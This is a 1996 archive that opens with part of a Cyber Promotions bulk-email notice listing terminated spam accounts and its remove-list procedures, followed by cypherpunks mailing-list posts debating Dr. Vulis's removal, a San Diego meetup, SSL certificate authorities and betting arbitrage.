*dollars@savetrees.com        Non-existant account.  The account was 
forged by the people who opened the accounts above.

*info1@cyberpromo.com         10-8-96: Unsolicited ads to INTERNET addresses 

*changes@answerme.com         9-30-96: Unsolicited ads to INTERNET addresses
*changes@cyberpromo.com       9-30-96: Unsolicited ads to INTERNET addresses
*changes@savetrees.com        9-30-96: Unsolicited ads to INTERNET addresses

*catalog@savetrees.com        9-30-96: Unsolicited ads to INTERNET addresses
*catalog@cyberpromo.com       9-30-96: Unsolicited ads to INTERNET addresses
*catalog@answerme.com         9-30-96: Unsolicited ads to INTERNET addresses

*eleven@answerme.com          9-28-96: Forgeries
*eleven@savetrees.com         9-28-96: Forgeries
*eleven@answerme.com          9-28-96: Forgeries

*tsahk@cyberpromo.com         9-27-96: Unsolicited ads to INTERNET addresses
*tsahk@answerme.com           9-27-96: Unsolicited ads to INTERNET addresses

*icssender@omni.cyberpromo.com   9-19-96: FORGED unsolicited email, making
it appear that Cyberpromo's auto-sender was responsible.  If you are in
receipt of the message, please look through the headers and complain to the
appropriate postmasters.

networkes@answerme.com       9-17-96: Ignored remove requests
networkes@cyberpromo.com     9-17-96: Ignored remove requests
networkes@savetrees.com      9-17-96: Ignored remove requests
reminders@answerme.com       9-17-96: Unsolicited ads to INTERNET addresses
reminders@savetrees.com      9-17-96: Unsolicited ads to INTERNET addresses
reminders@cyberpromo.com     9-17-96: Unsolicited ads to INTERNET addresses

salespromo@answerme.com      9-16-96: Unsolicited ads to INTERNET addresses
salespromo@savetrees.com     ""  ""         ""  ""
salespromo@cyberpromo.com    ""  ""         ""  ""
promo@answerme.com           ""  ""         ""  ""
promo@savetrees.com          ""  ""         ""  ""
promo@cyberpromo.com         ""  ""         ""  ""
info4free@answerme.com       ""  ""         ""  ""
info4free@savetrees.com      ""  ""         ""  ""
info4free@cyberpromo.com     ""  ""         ""  ""

manda@cyberpromo.com      8-28: Massive abuse to INTERNET addresses / FORGERY
manda@answerme.com        8-28: Massive abuse to INTERNET addresses / FORGERY
website@cyberpromo.com    8-27: excessive abuse to AOL / removals ignored
sevenmil@cyberpromo.com   8-27: excessive abuse / all removals ignored
sevenmil@answerme.com     8-27: ""     ""      ""     ""     ""    ""
vera@cyberpromo.com
vera@answerme.com
zol@answerme.com
website@answerme.com
allied@cyberpromo.com
allied@answerme.com
lists@cyberpromo.com
lists@answerme.com


If you have a complaint about an account that was not listed above, please
forward it to our President's personal account:  wallace@cyberpromo.com

We currently operate the following servers:
answerme.com
cyberpromo.com
omni.cyberpromo.com
gamut.cyberpromo.com

We DO NOT operate the following servers:
uunet
interramp
athens.servint
cais
postman.com
powernet
pwrsite


Cyber Promotions is *not* in business to annoy people.  We are in the
business of sending (and assisting in sending) commercial (and
noncommercial) email to people who are *not* offended by the receipt of
these messages.  Unfortunately, due to many experiences (many of which were
out of our control) we have had some problems accomplishing our goals
without upsetting some people.  We are truly sorry about that fact, and we
plan to "clean up the streets" as best as we can.

Some people have been under the impression that all email that appears to
come from cyberpromo.com, is from Cyber Promotions.  That is not true.
Most of the complaints that we have recently received have been in reaction
to people who have "autoresponders" and "virtual email addresses" on our
system.  In that case, their mail would have referenced an account on our
system, but originated from a different site.  Unfortunately, software like
Pegasus enables their mail to appear as if it came from us, driectly.  But,
their true origination is still evident in the headers.  You can determine
where it originated if you know how to decode headers.  But when doing so,
remember that Pegasus, for example, actually logs into *our* sendmail.  At
this time, the only messages that originate from Cyber Promotions, use our
proprietary Cyber Sender 2.1+ protocol which will always be indicated in
the organization: header.

Due to these "look alikes," it could appear that recipients' remove request
were being ignored.  WE DO NOT IGNORE REMOVE REQUESTS.

We now also maintain a "master" remove list of people who have asked to be
removed from all commercial mailing lists.  If you have received an email
from "Cyber Sender 2.1+", our new proprietary transport agent protocol,
then the remove features *do* work properly, now that all of the bugs have
been fixed (uppercase and lowercase now match, too).  No mail is allowed
out of our system, if the recipient's address is in our master remove list.
We currently have over 1.1 million email addresses in that file.  If you
wish to add your address to that master remove list, you can do so in two
different ways.  1.  You can send an email to remove@cyberpromo.com and
type "REMOVE ALL" in the subject or message field.  Our systems will
automatically permanently remove from our system the email address from
which you sent your request.  2.  You may also send an email to
manremove@cyberpromo.com and type as many email addresses as you wish in
the body of the message, each on its own line, without any comments.  The
subject line is ignored.  That address will also permanently remove the
addresses.  Please note: we have no control over mail that originates from
other sites, that travel through our SMTP (relay-host) servers.  We will
simply terminate any accounts that we maintain, that is referred to in
their abusive mail.


ATTENTION PRODIGY MEMBERS:
It has come to Cyber Promotions' attention, that some of you are having a
major problem removing yourselves from our lists.  This can be attributed
to the "alias" that your outgoing mail may contain.  If you are having
problems, please send an email to manremove@cyberpromo.com and type both of
your email addresses in the body of the message, each on its own line,
without any comments.  The subject line is ignored.  You probably have one
address like xazd35r@prodigy.com and another address like
sanford@prodigy.com.


ATTENTION PIPELINE MEMBERS:
It has come to Cyber Promotions' attention, that some of you are having a
major problem removing yourselves from our lists.  This can be attributed
to the "alias" that your outgoing mail may contain.  If you are having
problems, please send an email to manremove@cyberpromo.com and type your
email addresses in the body of the message, each on its own line, without
any comments.  The subject line is ignored.  You should type your email id
followed by the following THREE domains.   @usa.pipeline.com,
@pipeline.com,  @nyc.pipeline.com.  Even if you feel that your address is
definately only one of the three possibilities, you should still remove all
three addresses (each on its own line).


ATTENTION INTERNET USERS:
It has come to Cyber Promotions' attention, that some of you are having a
major problem removing yourselves from our lists.  This can be attributed
to the "alias" that your outgoing mail may contain.  If you are having
problems, please send an email to manremove@cyberpromo.com and type your
email addresses in the body of the message, each on its own line, without
any comments.  The subject line is ignored.  If your email address could
contain an alias like mail.domain.com or if you may have more that one
email address that points to another email address, you should remove them
all.  If you wish to remove *every* email address in your domain, please
contact us, and we will "grep" out every possibility.




REVISED TERMS OF SERVICE:

(We are also looking into the possibility that we may be forced to adopt
the policies of our backbone providers.  For the time being, we are
emulating their policies as best as we can while matching the needs of our
operations.)


1. We do not allow postings to inappropriate
newsgroups with reference to your account
because such postings result in *MUCH* more negative
response than positive.

2. We prohibit the advertising of offensive material
(ie. pornography, weapons, etc).

3. You may not use the account to participate in
illegal activities.

4. Our TOS strictly prohibits the sending of mass commercial
emails to INTERNET addresses, unless expressed permission
has been granted to you by the recipient.
In addition, you *must* honor all requests for removal
from your mailing list in a diligent manner.
Our service can be used in conjunction with advertisements that
you place with a bulk email company other than your
own or us, as long as they follow the same guidelines.

5.  Cyber Promotions reserves the right to terminate any account for any
reason at any time, without notice.


If you would like to send a complaint about any account @cyberpromo.com or
@answerme.com or @omni.cyberpromo.com  that has not been terminated, please
send email to: wallace@cyberpromo.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Sun, 3 Nov 1996 17:05:10 -0800 (PST)
To: "Murray Hayes" <mhayes@infomatch.com>
Subject: Re: FDA_dis
In-Reply-To: <199611031041.CAA04063@infomatch.com>
Message-ID: <9611040111.AA08631@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Without wishing to respond in detail to Hayes's drivel I'll just
point out that Shell's involvement with Nigeria is hardly beyond
question. It doesn't take a genius to realise that sanctions 
against Nigeria would hurt Shell's interest. Perhaps its just
me but I don't consider it altruism when a company acts in its
own interests. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 3 Nov 1996 20:41:09 -0800 (PST)
To: "Dale Thorn" <dthorn@gte.net>
Subject: Re: Discrete logs 1 [non-cryptography related annecdote] [NOISE]
Message-ID: <19961104043919703.AAA230@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 03 Nov 1996 09:36:32 -0800, Dale Thorn wrote:


>> >properties than regular logarithms, but I thought this bit of history
>> >would spark some memories in old-timers and give a new perspective for
>> >younger people.
>[snip]
>> The same thing goes on with SATs and especially SAT-IIs.   Some higher-end
>> calculators, esp. HPs, have plugin cartridges which automate much of the
>> basic work in chemistry, physics, etc.  I never saw anyone who used such
>> things even get asked about it.  Do we even need social engineering with
>> people this stupid?
>Technology has a base, much like a pyramid.  When you add enough layers, you can't
>find very many people who can traverse top to bottom and understand all of what's
>in between.
How true...
>I consider it a miracle when a student has the quality of consciousness to buck the
>trend and get themself a quality instrument (such as an HP-48SX/GX), since once they
>do that, they might be encouraged to explore further.

Were this the way it actually happened, I'd tend to agree.  However, the
group that bought high-end calculators solely to do things like this was
proably about 50-60% of the total.


#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 3 Nov 1996 20:43:57 -0800 (PST)
To: "wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
Message-ID: <19961104044209687.AAA199@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996 18:54:16 -0500 (EST), Will French wrote:

>  Except it's not very effective, is it, since he's still
>posting flames?  In any case, it's an admission on John
>Gilmore's part that libertarianism can't work without some
>measure of authoritarianism; the only argument is over _just how
>much_ authoritarianism we need.
  
>  I'm quite upset about this.  Up to now I was able to tell
>people that "there is at least one mailing list on the net that
>functions in a completely open manner".  No more.

This has been taken far too seriously.  Cypherpunks is a *PRIVATE* list. 
There is no obligation to accept anyone.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Sun, 3 Nov 1996 20:52:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
Message-ID: <199611040452.UAA11245@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


A quick note, I consider myself to be a nerd.  This is in part "reclaiming",
as I found myself uninterested in sports, as my classmates were, and found
computers fun.(good reason too, considering I had access to one of those, an
old TI99/4, longer than I had classmates).  I didn't grow up un either log
tables or slide rules, but I did learn how to do basic arithmetic on both
the traditional slide rule, and a round one designed for engineers.  At one
time, nerds were the intellectuals, the only thing that has really changed
is that now the nerds are in control, making intellectual arts a little more
appealing.  I'm only a 21 year old college student who is still somewhat
ignorant, make that quite ignorant, about the world, but I do feel that just
because it was an unpopular term to describe you, it isn't disrespectful to
consider ourselves nerds.  Relevance to Crypto, none.  Just attempting to
defend myself in the ether.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 3 Nov 1996 21:26:02 -0800 (PST)
To: Will French <wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
Message-ID: <3.0b28.32.19961103211007.006be6c0@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:54 PM 11/3/96 -0500, Will French wrote:

>  I'm quite upset about this.  Up to now I was able to tell
>people that "there is at least one mailing list on the net that
>functions in a completely open manner".  No more.

This is an easy problem to solve. Run your own list, you can set the
policies. There are service providers who will set up/maintain mailing
lists for you. If you can't find one, and "quite upset" means >$200/month
to you, let me know, and I'll set one up for you. Mailing lists aren't
exactly rocket science.

Actually, I'm curious exactly how much money "quite upset" means to you.
Perhaps you and the others who are also upset can buy Dmitri his own
mailing list. You can even subscribe your list to the cypherpunks list, and
advertise it as "total freedom cypherpunks", so that subscribers to your
list get everything on cpunks, plus Vulis' helpful commentaries.

The lesson to learn from this is not "all people are essentially
authoritarian" but "one jerk can ruin something good for 1500+ people."
Just one turd in the punchbowl, and all that. Doesn't matter if the turd
has a PhD, nobody wants any punch. When one person does something which
inconveniences or annoys many people (over and over, intentionally) it's
unsurprising (and not even "authoritarian", in any useful sense of the
word) that someone gets sick of it and tries to correct the situation.
Freedom isn't just for assholes; and the name for someone who won't take
care of himself (or his mailing list) isn't "friend of liberty", it's
"pushover". 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 3 Nov 1996 22:01:17 -0800 (PST)
To: Will French <wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611032354.SAA01354@interport.net>
Message-ID: <Pine.3.89.9611032113.A14631-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


You really, I mean *really*, need to read up on the fundamentals of 
libertarianism. Because you don't seem to have any idea what 
libertarianism is all about.

Sigh,
-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.


On Sun, 3 Nov 1996, Will French wrote:

>   Except it's not very effective, is it, since he's still
> posting flames?  In any case, it's an admission on John
> Gilmore's part that libertarianism can't work without some
> measure of authoritarianism; the only argument is over _just how
> much_ authoritarianism we need.
>   
>   I'm quite upset about this.  Up to now I was able to tell
> people that "there is at least one mailing list on the net that
> functions in a completely open manner".  No more.
> 
> 
> Will French  <wfrench@interport.net>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 3 Nov 1996 18:01:56 -0800 (PST)
To: wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611032354.SAA01354@interport.net>
Message-ID: <Pine.LNX.3.95.961103215353.866A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 3 Nov 1996, Will French wrote:

>   Except it's not very effective, is it, since he's still
> posting flames?  In any case, it's an admission on John
> Gilmore's part that libertarianism can't work without some
> measure of authoritarianism; the only argument is over _just how
> much_ authoritarianism we need.

It's only authoritarianism if the government is involved.  Clearly, the
government isn't involved in this matter.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMn1dFCzIPc7jvyFpAQHBfQf/Uo9yWMCsTiqP4YFUGltOEve4syhDTU+M
EuW8sshn8yaQxWu3ttjSbTbvBjFp2v/zWUmegx3GKfS/PDog97rdCYNjS9yVEEk5
GfuLjqCICq0yrUbyWcW5ZXOpWEBQWkAkoi1ehPbw3wPpfL2xwvQe392680DXJ5Zq
Ii3TFVVMAVQYPkljzrtrdtQy4q8BPJZn8byZpGSIuMBZEYzmln+hLjb15S/iZrQc
K9arzbXP7ENkagg46AOWI8ZylQ2JS9RsjbEaEBHPI3uHY54/NGHmXPEReWZXnOvo
d570tthrbA8vqJ27UTBqtP2B4MOPW+wMffgasqDbmBv4mpAr7tbMFQ==
=Rj13
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sun, 3 Nov 1996 22:05:51 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Censorship on cypherpunks
Message-ID: <01BBC9D3.2C218FA0@king1-23.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Will French

.........In any case, it's an admission on John
Gilmore's part that libertarianism can't work without some
measure of authoritarianism; the only argument is over 
_just how much_ authoritarianism we need.
..............................................


Well, as Ludwig von Mises [an economist] would put it, "The issue is not _some_ authoritarianism vs _no_ authoritariansim, but *whose* authoritarianism."

Libertarianism is about individual authority.  John Gilmore acted as the individual that he is.   If he shouldn't act upon under his own authority, he being in the position that he is relative to the existence of the cpunks, then the list doesn't represent libertarian ideals.

The list is not an institution representing a philosophy to which all participants must subordinate themselves.   Au contraire, it represents an opportunity for the free exercise of reason and one's personal judgement.   I think this has been a good example of that.  (obviously the venerable and computer-knowledgeable Dr. Vulius can find ways to sneak back in and continue to play his fun games, thus evidencing _his_  .... judgement.)

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Claborne <Claborne@CYBERTHOUGHT.com>
Date: Sun, 3 Nov 1996 22:09:13 -0800 (PST)
To: mthompso@qualcomm.com
Subject: San Diego CPunk Physical meet this Thursday
Message-ID: <3.0.32.19961103114155.00594ff8@cyberthought.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This Thursday!!!

San Diego Area CPUNKS symposium  Thursday, Nov. 7, 1996.

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  We discuss cryptography and other related subjects, have
the special cypherpunk dinner, and unwind after a long day at the grind stone.

   Don't forget to bring your public key  fingerprint.  If you can figure out
how to get it on the back of a business card, that would be cool.  If you want
the suspicious crowd there to sign your key, bring two forms of ID.

   Michelle is going to bring her PGP fingerprint in for signature.  Can you
believe it?

   Hopefully Lance Cottrell will give us an update on Mixmaster and what's
going on at San Diego's best ISP.  

   This will probably be the last symposium of the year since December is
normally quite crazzzzy.  
   
Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer + wine stuff.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend... 

NOTE: My primary e-mail address has changed to use my own domain.  You can 
reach me at "claborne@cyberthought.com". Permanently replace any other address
that you may have for me.  I am currently not subscribed to the CP list since
my current internet connection is slow (I'm waiting for my ISDN connection. :)

      2
  -- C  --

-----BEGIN PGP SIGNATURE-----
Version: 4.0 Personal Edition

iQEVAgUBMnz1eYP1MBWQ+9udAQEWiQf+MaNcptFKcb/VPDabtXn8cnfmGsQn3h0R
mzFIiXcHzh+OG2JfaX/oKR7wXFbhTMbKX9EbnFz0/IZeRZx9EO9Q3IrXUXyzZLBg
lSYKEs+cyUZc/3IIpRVXgD1PrUEjyjKkss3U9KQgsQpl8+E6vlefQkCdHpR/v7kZ
T1GyE3LqP+GAmr0M52kQeLKdyW3Ev6YVr5VTaxFz2uXePdJkUXXNvAE/V+UjdZn8
4dB6Y3P/JTBzxdfF6KCcdGttoq65JEfQYBjuxi9OSSkmS4vAfy36gUjQf6oiNgJX
JyvxTxn8MQ46/ggqsL0IprnwFX0S/VV+JjAMmIO4Tw8mOBFSDmGDWA==
=D1nQ
-----END PGP SIGNATURE-----

                              ...  __o
                             ..   -\<,
Claborne@CYBERTHOUGHT.com    ...(*)/(*)._ Providing thoughts on 
					  your computing needs.
http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.  PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sun, 3 Nov 1996 19:22:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE] Vulis, Censorship on cypherpunks & all this b.s.
Message-ID: <9611040322.AA18254@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text



After reading about the great moral indignation & general dispeptitude
people seem to be finding over Dimitri's removal, I basicly have
one response.

Get a life.

I mean really, the guy was (and is) freakin intolerable. He just caused
major noise on the list and that's about all.

The bottom line is that his removal just makes the list a more
sane, less crap filled place.

As for all the upset & indignation, well jesus, like you people can't
find better things to get indignant about? How bout spending the
same amount of time writing to your congressman about the bletcherous
crypto policies being promoted by government facists? Or the same
amount of time on sticking an html interface to an anon remailer
in your web page... etc. 

It just comes across as sanctimonious and incredibly irrelivant b.s.
for people to be "upset" in any way over some nitwit being jerked
off the list after he's been given far, far, more reasonable alternatives
than to act the way he had been.


Tim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sun, 3 Nov 1996 19:27:06 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Re: Censorship on cypherpunks
Message-ID: <199611040326.WAA15698@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


> It's only authoritarianism if the government is involved. 
> Clearly, the government isn't involved in this matter.

  Until now, I'd considered the list as a model of a libertarian
society, with the listowner as the government.  My point is that
if a mailing list (where physical force is generally not a
factor) can't be run without arbitrary sanctions against
members, how could anyone ever hope for a whole society, with a
real, gun-toting government, to run that way?


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 3 Nov 1996 22:29:07 -0800 (PST)
To: Sam Quigley <osquigle@midway.uchicago.edu>
Subject: Re: free SSL CAs?
In-Reply-To: <Pine.GSO.3.95.961103231441.3151I-100000@kimbark.uchicago.edu>
Message-ID: <Pine.3.89.9611032210.A14631-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


I don't think that their CA software is free, but they do have a free demo 
version. http://www.xcert.com


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.


On Sun, 3 Nov 1996, Sam Quigley wrote:

> 
> Are there any free Certificate Authorities for SSL?
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 3 Nov 1996 20:36:30 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: anonymous oddsman
In-Reply-To: <1.5.4.32.19961103102631.0039bfa4@popd.ix.netcom.com>
Message-ID: <199611040431.WAA16905@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


stewarts@ix.netcom.com wrote:
> 
> At 04:55 PM 11/2/96 -0600, you wrote:
> >Igor Chudov @ home wrote:
> >> >               Prices @ 09:21 GMT Sat 2nd Nov 96
> >> >         +---------+----------------+----------------+
> >> >         |         |  Ladbroke's    | William Hill   |
> >> >         +---------+----------------+----------------+
> >> >         | Clinton | Not currently offered by either |
> >> >         | Dole    |     6:1        |     10:1       |
> >> 
> >> Whew! They are wide open for arbitrage! Suppose that at Ladbroke I sell
> >> an obligation to pay $6 if Dole wins (they are apparently valuing it for
> >> this much), collecting $1. At the same time, to hedge my exposure, I go
> >> to "William Hill", and purchase their obligation to pay _me_ $10 if Bob
> >> Dole wins, paying the $1 bill that I just got at Ladbroke's.
> >> If bob dole loses, I lose nothing. If he wins, I make $4 out of air.
> >> I wonder why the beting markets are so imperfect.
> 
> Unless I've been misinterpreting the charts, you can't do it.
> You can go to Ladbroke's and put down a pound on Dole, 
> and if Dole wins they'll give you 6.  But if you want to bet that
> Dole will lose and Clinton will win, they'll tell you
> "Of course that's going to happen, silly.  Keep your money."
> Both houses are still willing to take the risk that Dole will win
> and give you odds on it; neither house is willing to take any 
> additional risk involving paying people money if Clinton wins;
> they've found all the takers they want for that.

If I am not mistaken, your objection has merit. My argument, however,
does not require one of the houses (Ladbroke's) accepts the reverse bets
(which pay me money of Clinton wins). My argument runs like this. There
are persons hanging around Landbroke who apparently think that if they
give Landbroke $1 in return for the promise to pay them $6 if Dole wins,
they get a good deal.

It is these people together with "William Hill" whom we exploit.

What I do is the following: I go to the Ladbroke's and offer to pay the
gamblers not $6, but $6.01 if Dole wins. Being somewhat rational, these
traders gamblers see a better deal than Ladbroke's offers, and
give me their $1 bills. This is very simple.

I take their $1 bills and run to "William Hill", where I take another
side of the bet. 

If Clinton wins, I get nothing and lose nothing. If Dole wins, I gain
$3.99 on every bet that these suckers agreed to make with me.

That was the essense of arbitrage that I propose.

Again, as I said, there is a way to make sure money on this 
situation, that is, to make money even if Klinton wins.

The arbitrage strategy is the following: as before, I go to the
Ladbroke's and offer to pay them not $6, but $6.01 if Dole wins.
I take their $1 bills and go to "William Hill". I buy, however, LESS
bets than dollar bills that I received. In particular, I buy 
$6.01 / $10.00 bets for each dollar that I receive.

The remaining money $1(1-6.01/10) I simply take to my bank. This money
is mine: if Clinton wins, nobody gets anything; if Dole wins, I get
exactly enough money from "William Hill" to pay off my debts to the
gamblers at Ladbroke's.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 3 Nov 1996 22:30:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
Message-ID: <199611040630.WAA02244@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


As I put on my flame resistant suit...

IMHO, most of the posts about John Gilmore's action re: Dr. Vulis are
seriously miss-analyzing what has happened.  As far as I can tell, John
instructed his Majordomo to refuse subscription requests to cypherpunks
from Dr. Vulis.  That is all that John has done.  What John has not done
is:

(1) John has not censored Dr. Vulis.  He is still free to speak to
cypherpunks by posting in the normal manner.

(2) John as not turned to the courts as some others have suggested. 
Turning to the courts would certainly not be the way a cryptoanarchist
would handle the situation.

The best paradigm I can come up with to analyze John's action is my quite
imperfect understanding of communitarian theory.  In essence,
communitarians say that there should be a level of social control between
individual rights and the forceful coercion of the state.  What John has
done is step forward and excommunicate Dr. Vulis.  He has said to Dr.
Vulis, "You are no longer a member of the cypherpunks community."

I would love to hear how people feel this action fits in to the
cryptoanarchy, libertarian utopias we frequently discuss.  E.g. Why is it
not a perfectly reasonable action for some one to take in an anarchy?


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 3 Nov 1996 21:43:46 -0800 (PST)
To: asgaard@Cor.sos.sll.se (Asgaard)
Subject: Political Derivative Securities
In-Reply-To: <Pine.HPP.3.91.961104015509.23465A-100000@cor.sos.sll.se>
Message-ID: <199611040446.WAA16999@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Asgaard wrote:
> 
> On Sat, 2 Nov 1996 ichudov@algebra.com wrote:
> 
> > >         | Clinton | Not currently offered by either |
> > >         | Dole    |     6:1        |     10:1       |
> > 
> > Whew! They are wide open for arbitrage! Suppose that at Ladbroke I sell

I meant "I go to Ladbroke and sell it to people hanging out there" 
-- see below.

> > an obligation to pay $6 if Dole wins (they are apparently valuing it for
> > this much), collecting $1. At the same time, to hedge my exposure, I go
> > to "William Hill", and purchase their obligation to pay _me_ $10 if Bob
> > Dole wins, paying the $1 bill that I just got at Ladbroke's.
> 
> The problem is that Ladbroke won't take your offer, they don't
> work that way. If they wanted to insure against a Dole victory
> they would place some of the money they got from betters on Dole
> at William Hill, at 10:1, instead of taking your offer at 6:1.
> But probably they get too few bets on Dole to bother with insurance;
> they do take risks. Another way of insuring themselves would have
> been to offer 11/10 or something on Clinton but obviously they
> don't feel they have to do that.

Seems like you see the problem yourself: obviously Ladbroke gets a free
ride since they can simply insure themselves by placing offsetting
bets at William Hill.

My argument, however, does not require one of the houses (Ladbroke's)
accepts the reverse bets (which pay me money of Clinton wins). My
argument runs like this: There are persons hanging around Landbroke who
apparently think that if they give Landbroke $1 in return for the
promise to pay them $6 if Dole wins, they get a good deal.

It is these people together with "William Hill" whom we exploit.

What I do is the following: I go to the Ladbroke's and offer to pay the
gamblers not $6, but $6.01 if Dole wins. Being somewhat rational, these
gamblers see a better deal than Ladbroke's offers, and give me their $1
bills. This is very simple.

I take their $1 bills and run to "William Hill", where I take another
side of the bet. 

If Clinton wins, I get nothing and lose nothing. If Dole wins, I gain
$3.99 on every bet that these suckers agreed to make with me.

That was the essense of arbitrage that I propose.

Again, as I said, there is a way to make sure money on this 
situation, that is, to make money even if Klinton wins.

The arbitrage strategy is the following: as before, I go to the
Ladbroke's and offer to pay them not $6, but $6.01 if Dole wins.
I take their $1 bills and go to "William Hill". I buy, however, LESS
bets than dollar bills that I received. In particular, I buy 
$6.01 / $10.00 bets for each dollar that I receive.

The remaining money $1(1-6.01/10) I simply take to my bank. This money
is mine: if Clinton wins, nobody gets anything; if Dole wins, I get
exactly enough money from "William Hill" to pay off my debts to the
gamblers at Ladbroke's.

Of course, if gamblers could compare prices and choose gambling houses
easily, no one would ever buy these bets from Ladbroke (unless they are
crazy).

This situation means that there is some market imperfection that 
does not allow arbitrage. It is not clear, though, what this
imperfection is.

It got me thinking about the following: someone oughtta make money by
selling "political derivative securities". For example, a bank could
issue Pro-Dole option contracts with a promise to pay the holder of the
contract $1000 if Bob Dole wins elections. These contracts could be
traded at, for example, CBOE, just as any other standard derivative
securities.

I see no real difference between a stock serving as an underlying
security, and an outcome of a political event serving as an underlying
security. There can be legitimate reasons for businesses to hold these
"political derivative securities". For example, businesses may hold them
to hedge their exposure to predictable changes in interest rates that
depend on the election outcomes.

Has this been done?

        - Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Sun, 3 Nov 1996 23:08:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Senator Goodlatte's warning (from IEEE Software article, Nov, 1996)
Message-ID: <199611040707.XAA20047@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


